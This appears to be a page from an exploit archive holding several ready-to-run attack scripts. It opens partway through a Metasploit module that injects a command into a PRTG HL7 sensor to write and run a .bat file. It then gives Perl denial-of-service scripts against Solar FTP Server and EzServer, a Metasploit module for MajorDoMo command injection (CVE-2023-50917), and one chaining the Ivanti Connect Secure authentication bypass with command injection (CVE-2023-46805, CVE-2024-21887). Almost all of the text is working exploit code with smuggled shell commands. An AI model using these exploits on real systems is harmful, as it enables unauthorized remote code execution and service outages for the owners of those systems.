print_good('Successfully authenticated against PRTG')<br /> else<br /> fail_with(Failure::NoAccess, 'Failure to authenticate against PRTG')<br /> end<br /> end<br /><br /> def get_csrf_token<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'welcome.htm'),<br /> 'keep_cookies' => true<br /> })<br /><br /> if res.nil? || res.body.nil?<br /> fail_with(Failure::NoAccess, 'Page with CSRF token not available')<br /> end<br /><br /> regex = /csrf-token" content="([^"]+)"/<br /> token = res.body[regex, 1]<br /><br /> print_status("Extracted csrf token: #{token}")<br /> token<br /> end<br /><br /> def delete_sensor_by_id(sensor_id)<br /> print_status("Deleting sensor #{sensor_id}")<br /> csrf_token = get_csrf_token<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'deleteobject.htm'),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'anti-csrf-token' => csrf_token,<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'vars_post' => {<br /> id: sensor_id,<br /> approve: 1<br /> }<br /> })<br /><br /> if res.nil? || res.body.nil?<br /> fail_with(Failure::NoAccess, 'Sensor deletion failed')<br /> end<br /> end<br /><br /> def get_created_sensor_id(sensor_name)<br /> print_status('Fetching created sensor id')<br /><br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'controls', 'deviceoverview.htm'),<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'id' => 40<br /> }<br /> })<br /><br /> if res.nil? || res.body.nil?<br /> fail_with(Failure::NoAccess, 'Page with sensorid not available')<br /> end<br /><br /> regex = /id=([0-9]+)">#{sensor_name}/<br /> sensor_id = res.body[regex, 1]<br /><br /> print_status("Extracted sensor_id: #{sensor_id}")<br /> sensor_id<br /> end<br /><br /> def run_sensor_with_id(sensor_id)<br /> csrf_token = get_csrf_token<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'scannow.htm'),<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'anti-csrf-token' => csrf_token,<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'vars_post' => {<br /> id: sensor_id<br /> }<br /> })<br /><br /> if res && res.code == 200<br /> print_good('Sensor started running')<br /> else<br /> fail_with(Failure::NoAccess, 'Failure to run sensor')<br /> end<br /> end<br /><br /> def write_bat_file_to_disk(cmd)<br /> # Uses the HL7Sensor for writing a .bat file to the disk<br /> cmd = cmd.gsub! '\\', '\\\\\\'<br /> print_status('Writing .bat to disk')<br /><br /> csrf_token = get_csrf_token<br /><br /> # Generate a random sensor name<br /> sensor_name = Rex::Text.rand_text_alphanumeric(8..10)<br /> bat_file_name = "#{Rex::Text.rand_text_alphanumeric(8..10)}.bat"<br /><br /> # Clean up the .bat file<br /> cmd = "#{cmd} & del %0"<br /><br /> print_status("Generated sensor_name #{sensor_name}")<br /> print_status("Generated bat_file_name #{bat_file_name}")<br /><br /> params = {<br /> 'name_' => sensor_name,<br /> 'parenttags_' => '',<br /> 'tags_' => 'dicom hl7',<br /> 'priority_' => '3',<br /> 'port_' => '104',<br /> 'timeout_' => '60',<br /> 'override_' => '0',<br /> 'sendapp_' => Rex::Text.rand_text_alphanumeric(4..5),<br /> 'sendfac_' => Rex::Text.rand_text_alphanumeric(4..5),<br /> 'recvapp_' => Rex::Text.rand_text_alphanumeric(4..5),<br /> 'recvfac_' => "#{Rex::Text.rand_text_alphanumeric(4..5)}\" -debug=\"..\\Custom Sensors\\EXE\\#{bat_file_name}\" -recvapp=\"#{Rex::Text.rand_text_alphanumeric(4..5)}",<br /> 'hl7file_' => "ADT_& #{cmd} & A08.hl7|ADT_A08.hl7||",<br /> 'hl7filename' => '',<br /> 'intervalgroup' => ['0', '1'],<br /> 'interval_' => '60|60 seconds',<br /> 'errorintervalsdown_' => '1',<br /> 'inherittriggers' => '1',<br /> 'id' => '40',<br /> 'sensortype' => 'hl7',<br /> 'tmpid' => '2',<br /> 'anti-csrf-token' => csrf_token<br /> }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => params<br /> })<br /><br /> unless res<br /> fail_with(Failure::NoAccess, 'Failure to connect to PRTG')<br /> end<br /><br /> if res && res.code == 302<br /> print_good('HL7 Sensor succesfully created')<br /> else<br /> fail_with(Failure::NoAccess, 'Failure to create HL7 sensor')<br /> end<br /> # Actually creating the sensor can take 1-2 seconds<br /> print_status('Checking for sensor creation')<br /> sensor_id = retry_until_truthy(timeout: 10) do<br /> get_created_sensor_id(sensor_name)<br /> end<br /><br /> print_status('Requesting HL7 Sensor to initiate scan')<br /><br /> run_sensor_with_id(sensor_id)<br /> @sensors_to_delete.push(sensor_id)<br /><br /> print_good('.bat file written to disk')<br /> bat_file_name<br /> end<br /><br /> def run_bat_file_from_disk(bat_file_name)<br /> print_status("Running the .bat file: #{bat_file_name}")<br /> csrf_token = get_csrf_token<br /> sensor_name = Rex::Text.rand_text_alphanumeric(8..10)<br /><br /> params = {<br /> 'name_' => sensor_name,<br /> 'parenttags_' => '',<br /> 'tags_' => 'exesensor',<br /> 'priority_' => '3',<br /> 'scriptplaceholdergroup' => '1',<br /> 'scriptplaceholder1description_' => '',<br /> 'scriptplaceholder1_' => '',<br /> 'scriptplaceholder2description_' => '',<br /> 'scriptplaceholder2_' => '',<br /> 'scriptplaceholder3description_' => '',<br /> 'scriptplaceholder3_' => '',<br /> 'scriptplaceholder4description_' => '',<br /> 'scriptplaceholder4_' => '',<br /> 'scriptplaceholder5description_' => '',<br /> 'scriptplaceholder5_' => '',<br /> 'exefile_' => "#{bat_file_name}|#{bat_file_name}||",<br /> 'exefilelabel' => '',<br /> 'exeparams_' => '',<br /> 'environment_' => '0',<br /> 'usewindowsauthentication_' => '0',<br /> 'mutexname_' => '',<br /> 'timeout_' => '60',<br /> 'valuetype_' => '0',<br /> 'channel_' => 'Value',<br /> 'unit_' => '#',<br /> 'monitorchange_' => '0',<br /> 'writeresult_' => '0',<br /> 'intervalgroup' => '0',<br /> 'interval_' => '43200|12 hours',<br /> 'errorintervalsdown_' => '1',<br /> 'inherittriggers' => '1',<br /> 'id' => '40',<br /> 'sensortype' => 'exe',<br /> 'tmpid' => '6',<br /> 'anti-csrf-token' => csrf_token<br /> }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'addsensor5.htm'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => params<br /> })<br /><br /> unless res<br /> fail_with(Failure::NoAccess, 'Failure to connect to PRTG')<br /> end<br /><br /> if res && res.code == 302<br /> print_status('EXE Script sensor created')<br /> else<br /> fail_with(Failure::NoAccess, 'Failure to create EXE Script sensor')<br /> end<br /><br /> print_status('Checking for sensor creation')<br /><br /> sensor_id = retry_until_truthy(timeout: 10) do<br /> get_created_sensor_id(sensor_name)<br /> end<br /> run_sensor_with_id(sensor_id)<br /> @sensors_to_delete.push(sensor_id)<br /> print_good('Exploit completed. Waiting for payload')<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 23 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The FTP server does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br />print "[+] Connecting to $ip:$port\n";<br />my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";<br /><br />$s->send("USER anon\r\n");<br />my $response = <$s>;<br />print $response;<br />$s->send("PASS anon\r\n");<br />$response = <$s>;<br />print $response;<br />$s->send("SYST\r\n");<br />$response = <$s>;<br />print $response;<br />sleep(2);<br />$s->send("PASV " . "\x41"x6631 . "\r\n");<br />sleep(3);<br />$response = <$s>;<br />print $response;<br />$response = <$s>;<br />print $response;<br />print ">>> Sending second payload\n";<br />$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");<br />$response = <$s>;<br />print $response;<br />sleep(2);<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# #\n"; <br /> print "# Solar FTP Server 2.1.2 - PASV - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'MajorDoMo Command Injection',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in MajorDoMo<br /> versions before 0662e5e.<br /> },<br /> 'Author' => [<br /> 'Valentin Lobstein', # Vulnerability discovery and Metasploit Module<br /> 'smcintyre-r7', # Assistance<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-50917'],<br /> ['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],<br /> ['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],<br /> ['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL<br /> ],<br /> 'DisclosureDate' => '2023-12-15',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> },<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Targets' => [['Automatic', {}]],<br /> 'Privileged' => false<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(80),<br /> OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),<br /> ])<br /> end<br /><br /> def execute_command(cmd)<br /> send_request_cgi(<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'url' => Rex::Text.encode_base64('rtsp://'),<br /> 'debug' => '1',<br /> 'transport' => "|| $(#{cmd});"<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited!")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),<br /> 'method' => 'GET'<br /> )<br /><br /> unless res && res.code == 200<br /> return CheckCode::Unknown('Did not receive a response from target.')<br /> end<br /><br /> unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'<br /> return CheckCode::Safe('The target is not MajorDoMo.')<br /> end<br /><br /> print_good('Target is identified as MajorDoMo instance')<br /> sleep_time = rand(5..10)<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /> res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /> print_status("Elapsed time: #{elapsed_time} seconds.")<br /> unless res && elapsed_time >= sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection<br /> vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti<br /> Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and<br /> 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are<br /> also vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-46805'], # The auth bypass vulnerability.<br /> ['CVE', '2024-21887'], # The command injection vulnerability.<br /> ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],<br /> ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']<br /> ],<br /> 'DisclosureDate' => '2024-01-10',<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => true, # Code execution as root.<br /> 'Targets' => [<br /> [<br /> # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:<br /> # cmd/linux/http/x64/meterpreter/reverse_tcp<br /> # cmd/linux/http/x64/shell/reverse_tcp<br /> # cmd/linux/http/x86/shell/reverse_tcp<br /> 'Linux Command',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_CMD]<br /> },<br /> ],<br /> [<br /> # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:<br /> # cmd/unix/python/meterpreter/reverse_tcp<br /> # cmd/unix/reverse_bash<br /> # cmd/unix/reverse_python<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => [ARCH_CMD]<br /> },<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve<br /> # the target system version information. If this requests succeeds, the target is vulnerable.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # If the vendor mitigation has been applied, the request will return 403 Forbidden.<br /> return CheckCode::Safe if res.code != 200<br /><br /> # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON<br /> # response, this is only for display purposes, we don't need to test the version information.<br /><br /> json_data = res.get_json_document<br /><br /> name = json_data.dig('software-inventory', 'software', 'name')<br /><br /> version = json_data.dig('software-inventory', 'software', 'version')<br /><br /> build = json_data.dig('software-inventory', 'software', 'build')<br /><br /> # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if<br /> # get_json_document could not parse the JSON (and will return an empty Hash).<br /> return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?<br /><br /> Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})")<br /> end<br /><br /> def exploit<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',<br /> 'ctype' => 'application/json',<br /> 'data' => {<br /> 'type' => ";#{payload.encoded} #",<br /> 'txtGCPProject' => Rex::Text.rand_text_alpha(8),<br /> 'txtGCPSecret' => Rex::Text.rand_text_alpha(8),<br /> 'txtGCPPath' => Rex::Text.rand_text_alpha(8),<br /> 'txtGCPBucket' => Rex::Text.rand_text_alpha(8)<br /> }.to_json<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 22 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: EzServer 6.4.017 - Denied of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denied of Service (DoS)<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.<br />#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41"x10698;<br /><br /> my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";<br /> $sock->send($payload);<br /> $sock->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] EzServer 6.4.017 - Denied of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>